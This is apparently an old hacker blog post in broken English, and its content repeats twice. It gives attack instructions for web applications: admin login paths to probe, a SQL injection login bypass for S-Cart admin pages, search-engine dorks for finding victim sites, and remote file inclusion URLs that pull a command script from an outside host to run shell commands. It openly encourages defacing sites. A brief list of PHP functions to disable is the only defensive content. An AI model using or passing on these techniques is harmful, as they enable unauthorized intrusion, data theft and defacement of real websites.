DORK SQL INJECTION WEB ATTACK
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
“root/login.asp”
“admin/index.asp”
login With :
Community ID:´or´´=´
Password:´or´´=´
Bugs File : admin page --> /admin
Display : http://target.com/s-cart/admin
1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to admin page with change the Url to :
http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!
login : admin
passwd : ´or´´=´
4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
Ok let´s to try :P~
secure php
how to secure php
1. open php.ini (find your selt were is the place)
2. find part safe_mode (default valiu is off), turn to =on
3. log off the danger fungsion like passthru, system. exec.
with fungsion name to the disable_function=
4. teh easy way n more secure --> use normal html ,not php :)
5. wacth out permission direktori and file,
note
this fungsion is better be off:
1. passthru, system, exec, myshellexec <-- php command shell
2. fopen <-- can executed remote file
3. fwrite, fputs <-- to write file
4. phpinfo <-- data with php
Hacking konsep :
http://[VICTIM]/mail_autocheck.php?pm_path=http://www.webloe.com/phpinjection.txt?&cmd=id
web target you can find in the search engine like google.
sample we can use keyword inurl atau allinurl:
allinurl:/mail_autocheck.php?pm_path=*.*
sample script php injection you can upload to your website
------------------END HERE---------------------------
##############################################
My_eGallery security exploit
Author : scariot shall live for ever
##############################################
Bugs File may be : displayCategory.php
Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php
Note :
for attacking u must use this script, save and upload to your website.
e.g save with namefile : cmd.txt
e.g from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
“root/login.asp”
“admin/index.asp”
login With :
Community ID:´or´´=´
Password:´or´´=´
Bugs File : admin page --> /admin
Display : http://target.com/s-cart/admin
1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to admin page with change the Url to :
http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!
login : admin
passwd : ´or´´=´
4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
Ok let´s to try :P~
secure php
how to secure php
1. open php.ini (find your selt were is the place)
2. find part safe_mode (default valiu is off), turn to =on
3. log off the danger fungsion like passthru, system. exec.
with fungsion name to the disable_function=
4. teh easy way n more secure --> use normal html ,not php :)
5. wacth out permission direktori and file,
note
this fungsion is better be off:
1. passthru, system, exec, myshellexec <-- php command shell
2. fopen <-- can executed remote file
3. fwrite, fputs <-- to write file
4. phpinfo <-- data with php
Hacking konsep :
http://[VICTIM]/mail_autocheck.php?pm_path=http://www.webloe.com/phpinjection.txt?&cmd=id
web target you can find in the search engine like google.
sample we can use keyword inurl atau allinurl:
allinurl:/mail_autocheck.php?pm_path=*.*
sample script php injection you can upload to your website
------------------END HERE---------------------------
##############################################
My_eGallery security exploit
Author : scariot shall live for ever
##############################################
Bugs File may be : displayCategory.php
Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php
Note :
for attacking u must use this script, save and upload to your website.
e.g save with namefile : cmd.txt
e.g from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt
0 komentar: